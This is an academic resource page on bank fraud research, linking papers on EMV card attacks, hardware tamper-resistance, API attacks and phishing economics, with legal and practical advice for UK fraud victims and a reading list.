The Bank Fraud Resource Page
Ross
Anderson
Cards get cloned; online bank accounts get phished; bank staff embezzle money;
banks rip off their customers. Both cardholders and merchants rip off banks.
Bank fraud is a multibillion dollar industry, and getting more complex all the
time. Most of the bad things that happen on the Internet end up with money
vanishing from someone's account.
Colleagues and I have been researching bank fraud for a couple of decades. In
this web page we've pulled together links to a lot of relevant research and
other resources. If you are a banker, a policeman, or a customer, this page is
for you. (If you're a fraudster, you may well know it all already.)
This page provides links to a number of key papers, home pages of active researchers, and other resources. Complementary pages include our security economics resource
page and our security psychology resource
page. There is also an interview I did with
Marc Tobias of security.org.
Key Papers
- Be Prepared: The EMV Pre-play Attack describes attacks based on design and implementation flaws in EMV that have been exploited since 2014 to rob sex-industry customers in the UK, Spain, Poland and elsewhere. The earlier conference version is Chip and
Skim: Cloning EMV Cards with the Pre-Play Attack (blog, preprint, BBC story and blog). You think you're paying £35 for a lap dance but you're actually authorising half a dozen large payments that are submitted one at a time until your account is cleaned out.
- Security
protocols and evidence: where many payment systems fail analyses why
dispute resolution is hard. In a nutshell, the systems needed to support it
properly just don't get built (blog).
- As for contactless payments, Martin Emms and colleagues have a super paper on Risks of Offline Verify PIN on
Contactless Cards which shows how you can program a Blackberry to act as a
fake terminal. Each time you brush against a target's wallet you can guess one
possible PIN for his Barclaycard. Once you get lucky you can clone the card.
- In 2010, we won an award
for a paper
describing the No-PIN attack: a man-in-the-middle attack that allows a stolen card to be
used with any pin. There was a TV piece on Newsnight
(see also ZDnet,
the Telegraph,
the Mail,
the Mirror,
the Register,
Bruce
Schneier, the press release
and our FAQ)
- The banks eventually reacted with an attempt to censor
our research (see the Guardian,
the Mail,
Radio
4 and Radio
5). There was an apt comment in 1641 by Bishop John
Wilkins.
- A
birthday present every eleven wallets? is the first proper study of the
security of customer-selected bank PINs, and documents the fact that some banks
let their customers choose really weak PINs like 1234; a thief finding a wallet
full of their customers' cards has a one in eleven chance of striking it lucky,
as opposed to one in eighteen for more prudent banks (blog, press, blog).
- Verified by
VISA – the mechanism that asks for your card password when you shop
online, is an example of how a poor design can win out if it has strong
deployment incentives (see also blog
post and slides).
- We have a tech report On
the Security of Internet Banking in South Korea which explores the
consequences of a nationally-mandated authentication system.
- We studied the (lack of) cooperation between bank phishing site takedown
contractors in The Economics of Online
Crime, which appeared in the Journal of Economic Perspectives. Banks
should ask their contractors to share feeds and compete on takedown time.
- The Impact
of Incentives on Notice and Take-down examines how take-down speed varies
with the incentive of the party requesting removal. Banks are quick to remove
phishing websites that mention them by name, but they ignore mule recruitment
websites because it is hard to tell which bank will be affected.
- A major study of Security
Economics and European Policy for the European Commission, recommended that
the EC get all countries to publish statistics of bank fraud, as Britain and
France already do.
- Thinking
inside the box: system-level failures of tamper proofing documented serious
vulnerabilities in Chip and PIN payment terminals and won the Best Practical Paper award at
the 2008 Oakland
conference. It was also featured on Newsnight; see the video
and the viewers'
comments. Here are some frequently
asked questions, our press
release, and coverage in the Register,
the Newsnight
blog and the Telegraph.
- Failures
on Fraud appeared in a central bankers' magazine and argued that
all this is yet another symptom of the failure of bank
regulation.
- We did an analysis of the failings of the
Financial Ombudsman Service (see also a video from the World
Economic Forum in November 2008).
- We had a paper at Financial Crypto on possible middleperson attacks on RFID/NFC
payments.
- I did a Google
tech talk on searching for covert communities and villains online.
- The Fed commissioned a paper
on fraud, risk and
nonbank payment systems.
- In the
Man-in-the-Middle Defence, we advocated that the customer be able to put a
trustworthy device between his bank card and a payment terminal, and sketched
how this might be done with EMV
- We wrote a big survey paper on cryptographic
processors, a shortened version of which appeared in Proc IEEE
- Why Information
Security is Hard – An Economic Perspective was the paper that got
information security people thinking about economics. It applies microeconomic
analysis to explain many phenomena that security folks had found to be
pervasive but perplexing, from adverse selection in payment systems governance
to the failure of cerification and evaluation schemes.
- Optimised to
Fail: Card Readers for Online Banking documents the shortcomings of the
CAP card readers used for online banking; see also our blog, press
coverage and the later journal
version.
-
"Why Cryptosystems Fail" may have been cited more than anything else I've
written. This
version appeared at ACMCCS 93 and explains how ATM fraud was done in the
early 1990s; here is the journal version
which appeared the following year in Communications of the ACM.
-
Liability and
Computer Security – Nine Principles took this work further, and
examines the problems with relying on cryptographic evidence.
- The introduction of EMV ('chip and PIN') was supposed to fix the
problem, but hasn't: Phish
and Chips documents protocol weaknesses in EMV.
- A Note on
EMV Secure Messaging in the IBM 4758 CCA documents how hardware security
module transactions introduced by VISA to support EMV broke the cryptosecurity
of multiple vendors' HSMs by making the APIs dangerous.
- The
Man-in-the-Middle Defence shows how to turn protocol weaknesses to
advantage.
- On a New Way to
Read Data from Memory describes techniques we developed that use lasers to
read out memory contents directly from a chip, without using the read-out
circuits provided by the vendor. The work builds on methods described in Optical Fault
Induction Attacks, which showed how laser pulses could be used to induce
faults in smartcards that would leak secret information. That paper appeared at
CHES 2002; it made the
front page of the New York
Times and also got covered by slashdot.
- Our seminal paper on hardware security, Tamper Resistance
– A Cautionary Note, describes how to penetrate the smartcards and
secure microcontrollers of the mid-1990s. It kicked off the modern academic
study of hardware security and won a Best Paper award.
- We followed up with Low Cost Attacks on
Tamper Resistant Devices, which describes a number of further tricks. See
also the home page of our hardware security
laboratory, Markus Kuhn's page of links to hardware
attack resources, and Theor Markettos' thesis.
- The
Memorability and Security of Passwords – Some Empirical
Results tackles an old problem - how do you train users to choose
passwords that are easy to remember but hard to guess? We did a
randomized controlled trial with a few hundred first year science
students which confirmed some folk beliefs, but debunked some others.
This became one of the classic papers on security usability.
- API Level
Attacks on Embedded Systems are a powerful class of attack we discovered on
cryptographic processors, and indeed any systems where more trusted systems
talk to less trusted ones. The idea is that a "secure" device can often be
defeated by sending it some sequence of transactions which its designer did not
expect. We've defeated pretty well every security processor we've looked at, at
least once.
- This line of research originated at Protocols 2000 with my paper The Correctness of
Crypto Transaction Sets; more followed in the first edition of my book.
- Robbing the bank
with a theorem prover shows how to apply advanced tools to the API
security problem.
- Ideas for future API research can be found in Protocol
Analysis, Composability and Computation, while an up-to-date
survey of API attacks can be found in the second edition of my my
book.
- NetCard
– A Practical Electronic Cash Scheme presents research on
micropayment protocols for use in electronic commerce.
- The Formal
Verification of a Payment System describes the first use of formal methods
to verify an actual payment protocol, which was (and still is) used in an
electronic purse product (VISA's COPAC card). This is a teaching example I use
to get the ideas of the BAN logic across to undergraduates. There is further
detailed information in a technical
report, which combines papers given at ESORICS 92 and Cardis 94.
Community - Home Pages of People with Relevant
Interests
Resources for Victims in the UK
If you are the victim of fraud against your online bank account, your bank
will often tell you that you are liable because of the terms and conditions on
the account. Most banks' contracts state that you are liable for any debits
made using your password, regardless of whether or not you made them (see
survey here).
It's even worse if you are the vicitim of a fraud against an EMV
(‘chip-and-PIN’) card; banks will routinely claim that as their
system is secure, you must be mistaken or lying. They will suggest that you
complain to the Financial Ombudsman Service; but the ombudsman routinely finds
against cardholders, regardless of the law and the evidence
(see here).
If you complain to the police, they will tell you to report it to the bank
first. This is designed to shrink the fraud statistics. But if the bank refuses
to refund your money, then you are the victim not the bank, and you're entitled
to have the crime recorded under section 53C of
the Home Office
Counting Rules For Recorded Crime April 2008 (see
also here). The police
unit dealing with card fraud is funded largely by the banks, a practice frowned on elsewhere.
The history of victims who've sued banks is not good; in the Alain
Job case,
for example, Alain failed to recover £2000 and was ordered to pay
£15,000 of the bank's costs; in another case I know a complainant
retained a solicitor to recover £10,000, and the solicitor charged her
another £10,000 without making any useful progress, leading her to
abandon the case. On the other hand, where banks have accused customers of
defrauding them, the customer often wins: see
the Badger
case, for example. If you get wrongfully prosecuted over a card transaction, or
if you're thinking of suing to get your money back, best read this submission
to the Treasury select committee. Keep any solicitor on a tight rein:
‘Your budget to get the case to stage X is £Y’. If you're
well-organised and articulate, you might manage to bring
a small claims case in person but for that you'd need to know your facts,
research the law, and be careful not to end up liable for the bank's costs. (The
bank will apply to have your case moved from the small claims track, where each
side pays its own costs, to the fast track, where the loser pays the winner's
costs. If the judge agrees, walk away!) You should also study the
papers in the Eve Russell case to see up close how banks and the ombudsman
work. There is also a very
useful paper on evidence in chip and pin cases which you should read closely
if you're bringing a case yourself, and get your lawyer to read if you hire one.
And if you need emotional support after being scammed, you can always call a
charity like Victim Support.
In short, we have a regulatory failure in Britain. Many more people
suffer frauds such as card cloning, phishing and dodgy online auctions than
suffer traditional acquisitive crimes such as burglary and car theft. However
the police don't want to know and the banks get away with dumping most of the
fraud risk on cardholders and merchants. As a victim, you'll have a hard time
getting your money back unless you can get your story in the press, or you can
threaten to take away enough business from your banker that he cares. Britain
is not honouring its oligation under Chapter 5 of the EU Payment
Services Directive. We need a change in the law.
Other Resources
Here are some suggestions for further reading:
- My book Security
Engineering might be a good introduction. It covers not just technologies
such as crypto and firewalls, but a number of specific applications from
banking to burglar alarms, and relevant attacks from chip tampering to API
manipulation. It also brings out the economic and psychological aspects.
- Bernardo Batiz-Lazo's Emergence and
Evolution of Proprietary ATM Networks in the UK recounts the history of the
ATM.
- The Banking and
Payments Research group at Federal Reserve has produced a number of
relevant papers including overviews of ATM systems, nonbank payment systems and
mobile payments in the USA. Their Chip-and-PIN:
Success and Challenges in Reducing Fraud gives a view of fraud levels in a
number of different countries in 2011, and the effect of EMV introduction. The
U.S. Adoption of Computer-Chip Payment Cards: Implications for Payment
Fraud discusses how the USA might be affected by its forthcoming
introduction there.
- David Evans and Richard Schmalensee's Paying
with Plastic gives the history of credit cards and analyses the industry's
economics.
- Mike Bond's Phantom
Withdrawals page has some useful case histories and links but has not been
maintained since 2009.
- Omar Choudary's MPhil
thesis, which the British banks tried to ban. It set out to
implement the man-in-the-middle defence described above, and alos provides a
platform on which to implement and test for the No-PIN attack.
- I've described The
Art of Deception by Kevin Mitnick as "the most disturbing security book
ever". Mitnick was jailed after a hacking spree based mostly on social
engineering: he became a master at telling lies on the telephone that would
cause people to give him passwords or otherwise open systems to attack. This
book tells how he did it.
- Understanding
scam victims: seven principles for systems security by Frank Stajano and
Paul Wilson examines a variety of scams and cons that were documented in the
BBC TV programme "The Real Hustle", extracts the principles on which the scams
were based, and applies them to system security.
- The
Psychology of Scams - Provoking and Committing Errors of Judgment, by
Stephen Lea and colleagues, is an encyclopaedic study of how people fall for
online and other scams, conducted for the UK Office of Fair Trading. The
authors give a thorough literature review, describe a large number of scams,
and then present four original studies of their own. Scams involve many of the
other techniques used by legitimate marketers; people who are poor at
regulating their emotions, and perhaps are socially isolated, may be
disproportionately vulnerable.
- Social
Phishing, by Tom Jagatic and others, reports how the percentage of students
who responded to a test phishing email was increased from 16% to 72% by
including relevant social information about the target (for example by making
the email appear to come from a friend of the target, identified via a social
networking site).
- Electronic
Commerce – Who Carries the Risk of Fraud? discusses how banks used
the move to online banking in the late 1990s to weaken consumer
protection.
- Understanding
Risk Management in Emerging Retail Payments is a research paper from the US
Federal Reserve on how technology is changing the risk landscape there. They
give a number of examples of scams that got closed down by the FTC and other
authorities; examine what can go wrong; and give an economic analysis of the
nature of payment security. It is a public good in that it provides general
benefits, but networks can exclude users, making it a club good instead.
- FIPR made submissions on consumer protection to the House of Lords inquiry
into Personal Internet
Security (with which the House of Lords basically agreed)
and the consultation on the National Payments Plan.
- Using Social
Psychology to Implement Security Policies, by Mich Kabay, discusses how to
get people to pay attention to security policies and the importance of the
social schemata by which people frame reality and judge behaviour. These are
particularly important when the desired behaviour violates social norms such as
holding doors open for people. A number of strategies for changing expectations
and norms are discussed.
- European
Cyber-Gangs Target Small U.S. Firms, Group Says is a Washington Post article
that brought to attention the rising trend towards wire-transfer fraud
being committed against businesses using stolen electronic banking credentials.
(This increasingly involves spear-phishing, or the use of social engineering to
get targets to install malware, as described here.)
- Identification
of Pressed Keys from Mechanical Vibrations by Gerson Faria and Hae-Yong Kim
shows hiw ATM PINs can be snarfed by measuring the keyboard vibrations as they
are entered.
- Identification
of Pressed Keys by Acoustic Transfer Function, by the same authors, shows
that some PIN pads allow PINs to be simply listened to; the sounds of the keys
are sufficiently different for one widely-used Ingenico PIN pad that remote PIN
stealing is trivial, despite its being Common Criteria certified.
- Finally, here's a piece on ATM skimmers.